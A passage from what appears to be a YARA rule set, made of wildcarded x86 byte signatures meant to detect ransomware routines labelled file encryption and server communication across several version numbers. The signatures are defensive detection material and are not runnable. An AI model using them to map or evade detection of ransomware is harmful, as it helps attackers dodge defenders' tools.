83 FF ?? 89 7C 24 ?? 75 21 56 FF 15 ?? ?? ?? ?? 5F 83 C8 ?? 5E 8B 8C 24 ?? ?? ?? ?? 33 CC E8 ?? - ?? ?? ?? 81 C4 ?? ?? ?? ?? C3 81 FF ?? ?? ?? ?? 77 D7 53 55 8D 84 24 ?? ?? ?? ?? 6A ?? 50 E8 ?? ?? ?? ?? 8B 94 24 ?? ?? - ?? ?? 8B 8C 24 ?? ?? ?? ?? 8B 84 24 ?? ?? ?? ?? 89 94 24 ?? ?? ?? ?? 8B D7 83 E2 ?? BB ?? ?? ?? ?? 2B DA 89 8C 24 - } - $encrypt_file_0_2_6a_2 = { - 8B 8C 24 ?? ?? ?? ?? 03 FB 57 89 84 24 ?? ?? ?? ?? 89 8C 24 ?? ?? ?? ?? E8 ?? ?? ?? ?? 8B E8 83 C4 ?? 85 ED 74 3C - 8B 4C 24 ?? 6A ?? 8D 44 24 ?? 50 51 55 56 FF 15 ?? ?? ?? ?? 85 C0 74 24 8B 44 24 ?? 3B 44 24 ?? 75 1A 53 8D 14 28 53 52 - E8 ?? ?? ?? ?? 57 E8 ?? ?? ?? ?? 8B D8 83 C4 ?? 85 DB 75 0F 56 FF 15 ?? ?? ?? ?? 83 C8 ?? E9 D5 00 00 00 8D 44 24 ?? 50 - 68 ?? ?? ?? ?? E8 ?? ?? ?? ?? 8D 4C 24 ?? 51 8D 94 24 ?? ?? ?? ?? 52 57 53 55 E8 ?? ?? ?? ?? 83 C4 ?? 6A ?? 6A ?? 6A ?? - 56 FF 15 ?? ?? ?? ?? 6A ?? 8D 44 24 ?? 50 6A ?? 8D 8C 24 ?? ?? ?? ?? 51 56 FF 15 ?? ?? ?? ?? 6A ?? 8D 54 24 ?? 52 6A ?? - 8D 44 24 ?? 50 56 FF 15 ?? ?? ?? ?? 6A ?? 8D 4C 24 ?? 51 57 53 56 FF 15 ?? ?? ?? ?? 56 FF 15 ?? ?? ?? ?? 8B 74 24 ?? 8D - 94 24 ?? ?? ?? ?? 52 56 FF 15 ?? ?? ?? ?? A1 ?? ?? ?? ?? 85 C0 74 0F 56 68 ?? ?? ?? ?? 50 E8 ?? ?? ?? ?? 83 C4 ?? 83 05 - ?? ?? ?? ?? ?? B8 ?? ?? ?? ?? 55 11 05 ?? ?? ?? ?? 01 3D ?? ?? ?? ?? 11 05 ?? ?? ?? ?? E8 ?? ?? ?? ?? 53 E8 ?? ?? ?? ?? - 83 C4 ?? B8 ?? ?? ?? ?? 8B 8C 24 ?? ?? ?? ?? 5D 5B 5F 5E 33 CC E8 ?? ?? ?? ?? 81 C4 ?? ?? ?? ?? C3 - } - $encrypt_file_0_3_1 = { - 53 8D 84 24 ?? ?? ?? ?? 6A ?? 50 E8 ?? ?? ?? ?? 8B 94 24 ?? ?? ?? ?? 8B 8C 24 ?? ?? ?? ?? 8B 84 24 ?? ?? ?? ?? 89 94 24 - ?? ?? ?? ?? 8B D5 83 E2 ?? BF ?? ?? ?? ?? 2B FA 89 8C 24 ?? ?? ?? ?? 8B 8C 24 ?? ?? ?? ?? 8D 1C 2F 53 89 84 24 ?? ?? ?? - ?? 89 8C 24 ?? ?? ?? ?? E8 ?? ?? ?? ?? 83 C4 ?? 85 C0 89 44 24 ?? 74 38 6A ?? 8D 4C 24 ?? 51 55 50 56 FF 15 ?? ?? ?? ?? - 85 C0 74 24 3B 6C 24 ?? 75 1E 57 57 8B 7C 24 ?? 8D 14 2F 52 E8 ?? ?? ?? ?? 53 E8 ?? ?? ?? ?? 8B E8 83 C4 ?? 85 ED 75 0F - 56 FF 15 ?? ?? ?? ?? 83 C8 ?? E9 0F 01 00 00 8D 44 24 ?? 50 68 ?? ?? ?? ?? E8 ?? ?? ?? ?? 8D 4C 24 ?? 51 8D 94 24 ?? ?? - ?? ?? 52 53 55 57 E8 ?? ?? ?? ?? 83 C4 ?? 6A ?? 6A ?? 6A ?? 56 FF 15 ?? ?? ?? ?? 8B 3D ?? ?? ?? ?? 6A ?? 8D 44 24 ?? 50 - 6A ?? 8D 8C 24 ?? ?? ?? ?? 51 56 FF D7 6A ?? 8D 54 24 ?? 52 6A ?? 8D 44 24 ?? 50 56 FF D7 6A ?? 8D 4C 24 ?? 51 53 55 56 - FF D7 56 FF 15 ?? ?? ?? ?? 8B 3D ?? ?? ?? ?? 33 F6 8D 9B ?? ?? ?? ?? 8B 44 24 ?? 6A ?? 8D 94 24 ?? ?? ?? ?? 52 50 FF 15 - ?? ?? ?? ?? 85 C0 75 27 FF 15 ?? ?? ?? ?? 3D ?? ?? ?? ?? 75 0E 8D 8C 24 ?? ?? ?? ?? 51 FF 15 ?? ?? ?? ?? 6A ?? FF D7 83 - C6 ?? 83 FE ?? 7C C0 A1 ?? ?? ?? ?? 33 F6 3B C6 74 13 8B 54 24 ?? 52 68 ?? ?? ?? ?? 50 E8 ?? ?? ?? ?? 83 C4 ?? 83 05 ?? - ?? ?? ?? ?? 8B 44 24 ?? 50 11 35 ?? ?? ?? ?? 01 1D ?? ?? ?? ?? 11 35 ?? ?? ?? ?? E8 ?? ?? ?? ?? 55 E8 ?? ?? ?? ?? 83 C4 - ?? B8 ?? ?? ?? ?? 8B 8C 24 ?? ?? ?? ?? 5B 5D 5F 5E 33 CC E8 ?? ?? ?? ?? 81 C4 ?? ?? ?? ?? C3 - } - $encrypt_file_0_3_3_1 = { - 55 8D 84 24 ?? ?? ?? ?? 6A ?? 50 E8 ?? ?? ?? ?? 8B 94 24 ?? ?? ?? ?? 8B 84 24 ?? ?? ?? ?? 8B 8C 24 ?? ?? ?? ?? 89 94 24 - ?? ?? ?? ?? 8B D3 83 E2 ?? BD ?? ?? ?? ?? 2B EA 89 84 24 ?? ?? ?? ?? 8D 04 2B 89 8C 24 ?? ?? ?? ?? 8B 8C 24 ?? ?? ?? ?? - 50 89 8C 24 ?? ?? ?? ?? 89 44 24 ?? E8 ?? ?? ?? ?? 8B F8 83 C4 ?? 85 FF 0F 84 0A 01 00 00 6A ?? 8D 44 24 ?? 50 53 57 56 - FF 15 ?? ?? ?? ?? 85 C0 75 18 56 FF 15 ?? ?? ?? ?? 57 E8 ?? ?? ?? ?? 83 C4 ?? 83 C8 ?? E9 98 01 00 00 3B 5C 24 ?? 75 1E - 55 8D 0C 1F 55 51 E8 ?? ?? ?? ?? 8B 6C 24 ?? 55 E8 ?? ?? ?? ?? 8B D8 83 C4 ?? 85 DB 75 18 57 E8 ?? ?? ?? ?? 83 C4 ?? 56 - FF 15 ?? ?? ?? ?? 83 C8 ?? E9 5C 01 00 00 8D 54 24 ?? 52 68 ?? ?? ?? ?? E8 ?? ?? ?? ?? 8D 44 24 ?? 50 8D 8C 24 ?? ?? ?? - ?? 51 55 53 57 E8 ?? ?? ?? ?? 83 C4 ?? 6A ?? 6A ?? 6A ?? 56 FF 15 ?? ?? ?? ?? 8B 2D ?? ?? ?? ?? 6A ?? 8D 54 24 ?? 52 6A - ?? 8D 84 24 ?? ?? ?? ?? 50 56 C7 44 24 ?? ?? ?? ?? ?? FF D5 85 C0 74 39 6A ?? 8D 4C 24 ?? 51 6A ?? 8D 54 24 ?? 52 56 C7 - 44 24 ?? ?? ?? ?? ?? FF D5 85 C0 74 1C 8B 4C 24 ?? 6A ?? 8D 44 24 ?? 50 51 53 56 C7 44 24 ?? ?? ?? ?? ?? FF D5 85 C0 75 - 1E 57 E8 ?? ?? ?? ?? 53 E8 ?? ?? ?? ?? 83 C4 ?? 56 FF 15 ?? ?? ?? ?? 83 C8 ?? E9 AB 00 00 00 56 FF 15 ?? ?? ?? ?? 56 FF - } - $encrypt_file_0_3_3_2 = { - 15 ?? ?? ?? ?? 8B 2D ?? ?? ?? ?? 33 F6 8D 49 ?? 8B 44 24 ?? 6A ?? 8D 94 24 ?? ?? ?? ?? 52 50 FF 15 ?? ?? ?? ?? 85 C0 75 - 2A FF 15 ?? ?? ?? ?? 3D ?? ?? ?? ?? 75 0E 8D 8C 24 ?? ?? ?? ?? 51 FF 15 ?? ?? ?? ?? 68 ?? ?? ?? ?? FF D5 83 C6 ?? 83 FE - ?? 7C BD A1 ?? ?? ?? ?? 33 F6 3B C6 74 13 8B 54 24 ?? 52 68 ?? ?? ?? ?? 50 E8 ?? ?? ?? ?? 83 C4 ?? 83 05 ?? ?? ?? ?? ?? - 8B 44 24 ?? 57 11 35 ?? ?? ?? ?? 01 05 ?? ?? ?? ?? 11 35 ?? ?? ?? ?? E8 ?? ?? ?? ?? 53 E8 ?? ?? ?? ?? 83 C4 ?? B8 ?? ?? - ?? ?? 8B 8C 24 ?? ?? ?? ?? 5D 5B 5F 5E 33 CC E8 ?? ?? ?? ?? 81 C4 ?? ?? ?? ?? C3 - } - $encrypt_file_0_3_4a_1 = { - B8 ?? ?? ?? ?? E8 ?? ?? ?? ?? A1 ?? ?? ?? ?? 33 C4 89 84 24 ?? ?? ?? ?? 33 C0 56 8B B4 24 ?? ?? ?? ?? 57 33 FF 68 ?? ?? - ?? ?? 89 84 24 ?? ?? ?? ?? 89 84 24 ?? ?? ?? ?? 89 84 24 ?? ?? ?? ?? 66 89 84 24 ?? ?? ?? ?? 88 84 24 ?? ?? ?? ?? 88 84 - 24 ?? ?? ?? ?? 89 84 24 ?? ?? ?? ?? 89 84 24 ?? ?? ?? ?? 89 84 24 ?? ?? ?? ?? 66 89 84 24 ?? ?? ?? ?? 88 84 24 ?? ?? ?? - ?? 8D 84 24 ?? ?? ?? ?? 57 50 89 74 24 ?? C6 84 24 ?? ?? ?? ?? ?? 89 7C 24 ?? 66 89 BC 24 ?? ?? ?? ?? E8 ?? ?? ?? ?? 6A - ?? 56 8D 8C 24 ?? ?? ?? ?? 68 ?? ?? ?? ?? 51 E8 ?? ?? ?? ?? 6A ?? 68 ?? ?? ?? ?? 8D 94 24 ?? ?? ?? ?? 68 ?? ?? ?? ?? 52 - E8 ?? ?? ?? ?? 83 C4 ?? 57 68 ?? ?? ?? ?? 6A ?? 57 57 68 ?? ?? ?? ?? 56 FF 15 ?? ?? ?? ?? 8B F0 83 FE ?? 75 19 5F 0B C0 - 5E 8B 8C 24 ?? ?? ?? ?? 33 CC E8 ?? ?? ?? ?? 81 C4 ?? ?? ?? ?? C3 53 57 56 FF 15 ?? ?? ?? ?? 8B D8 83 FB ?? 74 08 81 FB - ?? ?? ?? ?? 76 22 56 FF 15 ?? ?? ?? ?? 5B 5F 83 C8 ?? 5E 8B 8C 24 ?? ?? ?? ?? 33 CC E8 ?? ?? ?? ?? 81 C4 ?? ?? ?? ?? C3 - 55 8D 84 24 ?? ?? ?? ?? 6A ?? 50 E8 ?? ?? ?? ?? 6A ?? 8D 8C 24 ?? ?? ?? ?? 51 8D 94 24 ?? ?? ?? ?? 52 E8 ?? ?? ?? ?? 8B - C3 83 E0 ?? BD ?? ?? ?? ?? 2B E8 8D 04 2B 50 89 44 24 ?? E8 ?? ?? ?? ?? 8B F8 83 C4 ?? 85 FF 0F 84 0A 01 00 00 6A ?? 8D - 4C 24 ?? 51 53 57 56 FF 15 ?? ?? ?? ?? 85 C0 75 18 56 FF 15 ?? ?? ?? ?? 57 E8 ?? ?? ?? ?? 83 C4 ?? 83 C8 ?? E9 99 01 00 - } - $encrypt_file_0_3_4a_2 = { - 00 3B 5C 24 ?? 75 1E 55 8D 14 1F 55 52 E8 ?? ?? ?? ?? 8B 6C 24 ?? 55 E8 ?? ?? ?? ?? 8B D8 83 C4 ?? 85 DB 75 18 57 E8 ?? - ?? ?? ?? 83 C4 ?? 56 FF 15 ?? ?? ?? ?? 83 C8 ?? E9 5D 01 00 00 8D 44 24 ?? 50 68 ?? ?? ?? ?? E8 ?? ?? ?? ?? 8D 4C 24 ?? - 51 8D 94 24 ?? ?? ?? ?? 52 55 53 57 E8 ?? ?? ?? ?? 83 C4 ?? 6A ?? 6A ?? 6A ?? 56 FF 15 ?? ?? ?? ?? 8B 2D ?? ?? ?? ?? 6A - ?? 8D 44 24 ?? 50 6A ?? 8D 8C 24 ?? ?? ?? ?? 51 56 C7 44 24 ?? ?? ?? ?? ?? FF D5 85 C0 74 39 6A ?? 8D 54 24 ?? 52 6A ?? - 8D 44 24 ?? 50 56 C7 44 24 ?? ?? ?? ?? ?? FF D5 85 C0 74 1C 8B 54 24 ?? 6A ?? 8D 4C 24 ?? 51 52 53 56 C7 44 24 ?? ?? ?? - ?? ?? FF D5 85 C0 75 1E 57 E8 ?? ?? ?? ?? 53 E8 ?? ?? ?? ?? 83 C4 ?? 56 FF 15 ?? ?? ?? ?? 83 C8 ?? E9 AC 00 00 00 56 FF - 15 ?? ?? ?? ?? 56 FF 15 ?? ?? ?? ?? 8B 2D ?? ?? ?? ?? 33 F6 8D 64 24 ?? 8B 4C 24 ?? 6A ?? 8D 84 24 ?? ?? ?? ?? 50 51 FF - 15 ?? ?? ?? ?? 85 C0 75 2A FF 15 ?? ?? ?? ?? 3D ?? ?? ?? ?? 75 0E 8D 94 24 ?? ?? ?? ?? 52 FF 15 ?? ?? ?? ?? 68 ?? ?? ?? - ?? FF D5 83 C6 ?? 83 FE ?? 7C BD A1 ?? ?? ?? ?? 33 F6 3B C6 74 13 8B 4C 24 ?? 51 68 ?? ?? ?? ?? 50 E8 ?? ?? ?? ?? 83 C4 - ?? 83 05 ?? ?? ?? ?? ?? 8B 54 24 ?? 57 11 35 ?? ?? ?? ?? 01 15 ?? ?? ?? ?? 11 35 ?? ?? ?? ?? E8 ?? ?? ?? ?? 53 E8 ?? ?? - ?? ?? 83 C4 ?? B8 ?? ?? ?? ?? 8B 8C 24 ?? ?? ?? ?? 5D 5B 5F 5E 33 CC E8 ?? ?? ?? ?? 81 C4 ?? ?? ?? ?? C3 - } - $encrypt_file_0_3_5a_1 = { - B8 ?? ?? ?? ?? E8 ?? ?? ?? ?? A1 ?? ?? ?? ?? 33 C4 89 84 24 ?? ?? ?? ?? 53 33 C0 55 56 57 33 FF 68 ?? ?? ?? ?? 89 84 24 - ?? ?? ?? ?? 89 84 24 ?? ?? ?? ?? 89 84 24 ?? ?? ?? ?? 66 89 84 24 ?? ?? ?? ?? 88 84 24 ?? ?? ?? ?? 88 84 24 ?? ?? ?? ?? - 89 84 24 ?? ?? ?? ?? 89 84 24 ?? ?? ?? ?? 89 84 24 ?? ?? ?? ?? 66 89 84 24 ?? ?? ?? ?? 88 84 24 ?? ?? ?? ?? 8D 84 24 ?? - ?? ?? ?? 8B F1 57 50 89 74 24 ?? C6 84 24 ?? ?? ?? ?? ?? 89 7C 24 ?? 66 89 BC 24 ?? ?? ?? ?? E8 ?? ?? ?? ?? 83 C4 ?? 6A - ?? 56 8D 8C 24 ?? ?? ?? ?? 68 ?? ?? ?? ?? 51 E8 ?? ?? ?? ?? 6A ?? 68 ?? ?? ?? ?? 8D 94 24 ?? ?? ?? ?? 68 ?? ?? ?? ?? 52 - E8 ?? ?? ?? ?? 83 C4 ?? 57 68 ?? ?? ?? ?? 6A ?? 57 57 68 ?? ?? ?? ?? 56 FF 15 ?? ?? ?? ?? 8B F0 83 FE ?? 0F 84 D2 00 00 - 00 57 56 FF 15 ?? ?? ?? ?? 8B E8 83 FD ?? 0F 84 B8 00 00 00 3B EF 0F 84 B0 00 00 00 81 FD ?? ?? ?? ?? 0F 87 A4 00 00 00 - 8D 4F ?? 8D 94 24 ?? ?? ?? ?? E8 ?? ?? ?? ?? 8B 8C 24 ?? ?? ?? ?? 8B 84 24 ?? ?? ?? ?? 8B 94 24 ?? ?? ?? ?? 89 8C 24 ?? - ?? ?? ?? 89 84 24 ?? ?? ?? ?? 8B 84 24 ?? ?? ?? ?? 8B CD 83 E1 ?? BB ?? ?? ?? ?? 2B D9 89 84 24 ?? ?? ?? ?? 8D 04 2B 50 - 89 94 24 ?? ?? ?? ?? 89 44 24 ?? E8 ?? ?? ?? ?? 8B F8 83 C4 ?? 85 FF 74 3B 6A ?? 8D 54 24 ?? 52 55 57 56 FF 15 ?? ?? ?? - ?? 85 C0 75 18 56 FF 15 ?? ?? ?? ?? 57 E8 ?? ?? ?? ?? 83 C4 ?? 83 C8 ?? E9 98 01 00 00 3B 6C 24 ?? 74 18 57 E8 - } - $encrypt_file_0_3_5a_2 = { - 83 C4 ?? 56 FF 15 ?? ?? ?? ?? 83 C8 ?? E9 7A 01 00 00 53 8D 04 2F 53 50 E8 ?? ?? ?? ?? 8B 6C 24 ?? 83 C4 ?? 55 E8 ?? - ?? ?? ?? 8B D8 83 C4 ?? 85 DB 74 C7 8D 4C 24 ?? 51 68 ?? ?? ?? ?? E8 ?? ?? ?? ?? 8D 54 24 ?? 52 8D 84 24 ?? ?? ?? ?? 50 - 55 57 8B CB E8 ?? ?? ?? ?? 83 C4 ?? 6A ?? 6A ?? 6A ?? 56 FF 15 ?? ?? ?? ?? 8B 2D ?? ?? ?? ?? 6A ?? 8D 4C 24 ?? 51 6A ?? - 8D 94 24 ?? ?? ?? ?? 52 56 C7 44 24 ?? ?? ?? ?? ?? FF D5 85 C0 75 0F 57 E8 ?? ?? ?? ?? 83 C4 ?? 53 E9 5E FF FF FF 6A ?? - 8D 44 24 ?? 50 6A ?? 8D 4C 24 ?? 51 56 C7 44 24 ?? ?? ?? ?? ?? FF D5 85 C0 74 D4 8B 44 24 ?? 6A ?? 8D 54 24 ?? 52 50 53 - 56 C7 44 24 ?? ?? ?? ?? ?? FF D5 85 C0 74 B8 56 FF 15 ?? ?? ?? ?? 56 FF 15 ?? ?? ?? ?? 8B 2D ?? ?? ?? ?? 33 F6 EB 09 8D - A4 24 ?? ?? ?? ?? 8B FF 8B 54 24 ?? 6A ?? 8D 8C 24 ?? ?? ?? ?? 51 52 FF 15 ?? ?? ?? ?? 85 C0 75 2A FF 15 ?? ?? ?? ?? 3D - ?? ?? ?? ?? 75 0E 8D 84 24 ?? ?? ?? ?? 50 FF 15 ?? ?? ?? ?? 68 ?? ?? ?? ?? FF D5 83 C6 ?? 83 FE ?? 7C BD A1 ?? ?? ?? ?? - 33 F6 3B C6 74 13 8B 4C 24 ?? 51 68 ?? ?? ?? ?? 50 E8 ?? ?? ?? ?? 83 C4 ?? 83 05 ?? ?? ?? ?? ?? 8B 54 24 ?? 57 11 35 ?? - ?? ?? ?? 01 15 ?? ?? ?? ?? 11 35 ?? ?? ?? ?? E8 ?? ?? ?? ?? 83 C4 ?? 53 E8 ?? ?? ?? ?? 83 C4 ?? B8 ?? ?? ?? ?? 8B 8C 24 - ?? ?? ?? ?? 5F 5E 5D 5B 33 CC E8 ?? ?? ?? ?? 81 C4 ?? ?? ?? ?? C3 - } - $server_communication_0_2_6a_1 = { - B8 ?? ?? ?? ?? E8 ?? ?? ?? ?? A1 ?? ?? ?? ?? 33 C4 89 84 24 ?? ?? ?? ?? 8B 84 24 ?? ?? ?? ?? 8B 00 53 33 DB 39 1D ?? ?? - ?? ?? A3 ?? ?? ?? ?? 0F 85 ?? ?? ?? ?? 83 F8 ?? 0F 87 ?? ?? ?? ?? 55 56 57 68 ?? ?? ?? ?? 8D 44 24 ?? 53 50 88 5C 24 ?? - E8 ?? ?? ?? ?? 68 ?? ?? ?? ?? 8D 8C 24 ?? ?? ?? ?? 53 51 88 9C 24 ?? ?? ?? ?? E8 ?? ?? ?? ?? 33 C0 53 89 44 24 ?? 89 44 - 24 ?? 89 44 24 ?? E8 ?? ?? ?? ?? 8B 0D ?? ?? ?? ?? 83 C4 ?? 51 8B 0D ?? ?? ?? ?? 51 8B 0D ?? ?? ?? ?? 51 8B 0D ?? ?? ?? - ?? 51 52 8B 15 ?? ?? ?? ?? 50 A1 ?? ?? ?? ?? 68 ?? ?? ?? ?? 53 68 ?? ?? ?? ?? 52 50 E8 ?? ?? ?? ?? 53 68 ?? ?? ?? ?? 52 - 50 E8 ?? ?? ?? ?? 8B 0D ?? ?? ?? ?? 52 8B 15 ?? ?? ?? ?? 50 A1 ?? ?? ?? ?? 51 52 68 ?? ?? ?? ?? 50 E8 ?? ?? ?? ?? 83 C4 - ?? 50 68 ?? ?? ?? ?? 8D 4C 24 ?? 68 ?? ?? ?? ?? 51 E8 ?? ?? ?? ?? 8D 44 24 ?? 83 C4 ?? 8D 70 ?? 8A 08 83 C0 ?? 3A CB 75 - F7 8D 54 24 ?? 52 8D 8C 24 ?? ?? ?? ?? 51 2B C6 50 8D 54 24 ?? 52 E8 ?? ?? ?? ?? 8D 4C 24 ?? 51 8D 94 04 ?? ?? ?? ?? 52 - E8 ?? ?? ?? ?? 8D 84 24 ?? ?? ?? ?? 50 68 ?? ?? ?? ?? 8D 4C 24 ?? 68 ?? ?? ?? ?? 51 E8 ?? ?? ?? ?? 8B 15 ?? ?? ?? ?? 83 - C4 ?? 53 53 53 53 52 FF 15 ?? ?? ?? ?? 8B F8 A1 ?? ?? ?? ?? 8B 0C 85 ?? ?? ?? ?? 8B 14 85 ?? ?? ?? ?? 51 53 52 FF 15 - } - $server_communication_0_2_6a_2 = { - A1 ?? ?? ?? ?? 8B 0C 85 ?? ?? ?? ?? 53 53 6A ?? 53 53 68 ?? ?? ?? ?? 51 57 FF 15 ?? ?? ?? ?? 53 68 ?? ?? ?? ?? - 53 53 53 8D 54 24 ?? 52 8B E8 68 ?? ?? ?? ?? 55 FF 15 ?? ?? ?? ?? 68 ?? ?? ?? ?? 8B F0 8D 84 24 ?? ?? ?? ?? 53 50 88 9C - 24 ?? ?? ?? ?? E8 ?? ?? ?? ?? 83 C4 ?? 53 53 53 53 56 89 5C 24 ?? FF 15 ?? ?? ?? ?? FF 15 ?? ?? ?? ?? 85 C0 0F 85 ?? ?? - ?? ?? 8D 4C 24 ?? 51 68 ?? ?? ?? ?? 8D 94 24 ?? ?? ?? ?? 52 56 FF 15 ?? ?? ?? ?? 8D 84 24 ?? ?? ?? ?? 68 ?? ?? ?? ?? 50 - E8 ?? ?? ?? ?? 83 C4 ?? 85 C0 0F 84 ?? ?? ?? ?? 33 C0 68 ?? ?? ?? ?? 8D 4C 24 ?? 68 ?? ?? ?? ?? 51 C7 05 ?? ?? ?? ?? ?? - ?? ?? ?? 89 5C 24 ?? A3 ?? ?? ?? ?? A3 ?? ?? ?? ?? A3 ?? ?? ?? ?? A3 ?? ?? ?? ?? A3 ?? ?? ?? ?? A3 ?? ?? ?? ?? A3 ?? ?? - ?? ?? A3 ?? ?? ?? ?? E8 ?? ?? ?? ?? 8B 54 24 ?? 52 68 ?? ?? ?? ?? 6A ?? 68 ?? ?? ?? ?? E8 ?? ?? ?? ?? 8B 44 24 ?? 50 E8 - ?? ?? ?? ?? 83 C4 ?? 56 8B 35 ?? ?? ?? ?? FF D6 - } - $server_communication_0_3_1_1 = { - 8B 0D ?? ?? ?? ?? 83 C4 ?? 68 ?? ?? ?? ?? 51 8B 0D ?? ?? ?? ?? 51 8B 0D ?? ?? ?? ?? 51 8B 0D ?? ?? ?? ?? 51 8B 0D ?? ?? - ?? ?? 51 8B 0D ?? ?? ?? ?? 51 52 8B 15 ?? ?? ?? ?? 50 A1 ?? ?? ?? ?? 68 ?? ?? ?? ?? 53 68 ?? ?? ?? ?? 52 50 E8 ?? ?? ?? - ?? 53 68 ?? ?? ?? ?? 52 50 E8 ?? ?? ?? ?? 8B 0D ?? ?? ?? ?? 52 8B 15 ?? ?? ?? ?? 50 A1 ?? ?? ?? ?? 51 52 68 ?? ?? ?? ?? - 50 E8 ?? ?? ?? ?? 83 C4 ?? 50 68 ?? ?? ?? ?? 8D 4C 24 ?? 68 ?? ?? ?? ?? 51 E8 ?? ?? ?? ?? 8D 44 24 ?? 83 C4 ?? 8D 48 ?? - 8A 10 83 C0 ?? 3A D3 75 F7 55 56 57 2B C1 8D 54 24 ?? 52 8D 8C 24 ?? ?? ?? ?? 51 50 8D 54 24 ?? 52 E8 ?? ?? ?? ?? 8D 4C - 24 ?? 51 8D 94 04 ?? ?? ?? ?? 52 E8 ?? ?? ?? ?? 8D 84 24 ?? ?? ?? ?? 50 68 ?? ?? ?? ?? 8D 4C 24 ?? 68 ?? ?? ?? ?? 51 E8 - ?? ?? ?? ?? 8B 15 ?? ?? ?? ?? 83 C4 ?? 53 53 53 53 52 FF 15 ?? ?? ?? ?? 8B F8 A1 ?? ?? ?? ?? 8B 0C 85 ?? ?? ?? ?? 8B 14 - 85 ?? ?? ?? ?? 51 53 52 FF 15 ?? ?? ?? ?? A1 ?? ?? ?? ?? 83 F8 ?? 53 53 6A ?? 53 53 73 23 8B 04 85 ?? ?? ?? ?? 6A ?? 50 - 57 FF 15 ?? ?? ?? ?? 53 68 ?? ?? ?? ?? 53 53 53 8D 4C 24 ?? 8B F0 51 EB 24 8B 14 85 ?? ?? ?? ?? 68 ?? ?? ?? ?? 52 57 FF - 15 ?? ?? ?? ?? 53 68 ?? ?? ?? ?? 53 53 8B F0 53 8D 44 24 ?? 50 68 ?? ?? ?? ?? 56 FF 15 ?? ?? ?? ?? 68 ?? ?? ?? ?? 8D 8C - } - $server_communication_0_3_1_2 = { - 24 ?? ?? ?? ?? 53 51 8B E8 88 9C 24 ?? ?? ?? ?? E8 ?? ?? ?? ?? 83 C4 ?? 53 53 53 53 55 89 5C 24 ?? FF 15 ?? ?? ?? ?? FF - 15 ?? ?? ?? ?? 85 C0 0F 85 ?? ?? ?? ?? 8D 54 24 ?? 52 68 ?? ?? ?? ?? 8D 84 24 ?? ?? ?? ?? 50 55 FF 15 ?? ?? ?? ?? 8D 8C - 24 ?? ?? ?? ?? 68 ?? ?? ?? ?? 51 E8 ?? ?? ?? ?? 83 C4 ?? 85 C0 0F 84 ?? ?? ?? ?? 33 C0 68 ?? ?? ?? ?? 8D 54 24 ?? 68 ?? - ?? ?? ?? 52 C7 05 ?? ?? ?? ?? ?? ?? ?? ?? 89 5C 24 ?? A3 ?? ?? ?? ?? A3 ?? ?? ?? ?? A3 ?? ?? ?? ?? A3 ?? ?? ?? ?? A3 ?? - ?? ?? ?? A3 ?? ?? ?? ?? A3 ?? ?? ?? ?? A3 ?? ?? ?? ?? E8 ?? ?? ?? ?? 8B 44 24 ?? 50 68 ?? ?? ?? ?? 6A ?? 68 ?? ?? ?? ?? - E8 ?? ?? ?? ?? 8B 4C 24 ?? 51 E8 ?? ?? ?? ?? 8B 1D ?? ?? ?? ?? 83 C4 ?? 55 FF D3 - } - $server_communication_0_3_3_1 = { - B8 ?? ?? ?? ?? E8 ?? ?? ?? ?? A1 ?? ?? ?? ?? 33 C4 89 84 24 ?? ?? ?? ?? B8 ?? ?? ?? ?? 8D 50 ?? 8A 08 83 C0 ?? 84 C9 75 - F7 2B C2 75 0D 68 ?? ?? ?? ?? E8 ?? ?? ?? ?? 83 C4 ?? 53 55 56 57 68 ?? ?? ?? ?? 8D 44 24 ?? 6A ?? 50 C6 44 24 ?? ?? E8 - ?? ?? ?? ?? 68 ?? ?? ?? ?? 8D 8C 24 ?? ?? ?? ?? 6A ?? 51 C6 84 24 ?? ?? ?? ?? ?? E8 ?? ?? ?? ?? 8B 15 ?? ?? ?? ?? 33 C0 - 83 C4 ?? 50 50 50 50 52 89 44 24 ?? 89 44 24 ?? 89 44 24 ?? FF 15 ?? ?? ?? ?? 8B 1D ?? ?? ?? ?? 8B F8 89 7C 24 ?? 33 F6 - EB 04 8B 7C 24 ?? 68 ?? ?? ?? ?? 8D 44 24 ?? 6A ?? 50 E8 ?? ?? ?? ?? 68 ?? ?? ?? ?? 8D 8C 24 ?? ?? ?? ?? 6A ?? 51 E8 ?? - ?? ?? ?? 6A ?? E8 ?? ?? ?? ?? 8B 0D ?? ?? ?? ?? 83 C4 ?? 68 ?? ?? ?? ?? 51 8B 0D ?? ?? ?? ?? 51 8B 0D ?? ?? ?? ?? 56 51 - 8B 0D ?? ?? ?? ?? 51 8B 0D ?? ?? ?? ?? 51 52 8B 15 ?? ?? ?? ?? 50 A1 ?? ?? ?? ?? 68 ?? ?? ?? ?? 6A ?? 68 ?? ?? ?? ?? 52 - 50 E8 ?? ?? ?? ?? 6A ?? 68 ?? ?? ?? ?? 52 50 E8 ?? ?? ?? ?? 8B 0D ?? ?? ?? ?? 52 8B 15 ?? ?? ?? ?? 50 A1 ?? ?? ?? ?? 51 - 52 68 ?? ?? ?? ?? 50 E8 ?? ?? ?? ?? 83 C4 ?? 50 68 ?? ?? ?? ?? 68 ?? ?? ?? ?? 8D 4C 24 ?? 68 ?? ?? ?? ?? 51 E8 ?? ?? ?? - ?? 8D 44 24 ?? 83 C4 ?? 8D 48 ?? 8A 10 83 C0 ?? 84 D2 75 F7 2B C1 8D 54 24 ?? 52 8D 8C 24 ?? ?? ?? ?? 51 50 8D 54 24 - } - $server_communication_0_3_3_2 = { - 52 E8 ?? ?? ?? ?? 8D 4C 24 ?? 51 8D 94 04 ?? ?? ?? ?? 52 E8 ?? ?? ?? ?? 8D 84 24 ?? ?? ?? ?? 50 68 ?? ?? ?? ?? 8D 4C 24 - ?? 68 ?? ?? ?? ?? 51 E8 ?? ?? ?? ?? 83 C4 ?? 83 FE ?? 6A ?? 6A ?? 6A ?? 6A ?? 6A ?? 7D 23 8B 14 B5 ?? ?? ?? ?? 6A ?? 52 - 57 FF D3 6A ?? 68 ?? ?? ?? ?? 6A ?? 6A ?? 8B F8 6A ?? 8D 44 24 ?? 50 EB 3C 8B 0C B5 ?? ?? ?? ?? 68 ?? ?? ?? ?? 51 57 FF - D3 8B 14 B5 ?? ?? ?? ?? 52 8B F8 8B 04 B5 ?? ?? ?? ?? 6A ?? 50 FF 15 ?? ?? ?? ?? 6A ?? 68 ?? ?? ?? ?? 6A ?? 6A ?? 6A ?? - 8D 4C 24 ?? 51 68 ?? ?? ?? ?? 57 FF 15 ?? ?? ?? ?? 68 ?? ?? ?? ?? 8D 94 24 ?? ?? ?? ?? 6A ?? 52 8B E8 C6 84 24 ?? ?? ?? - 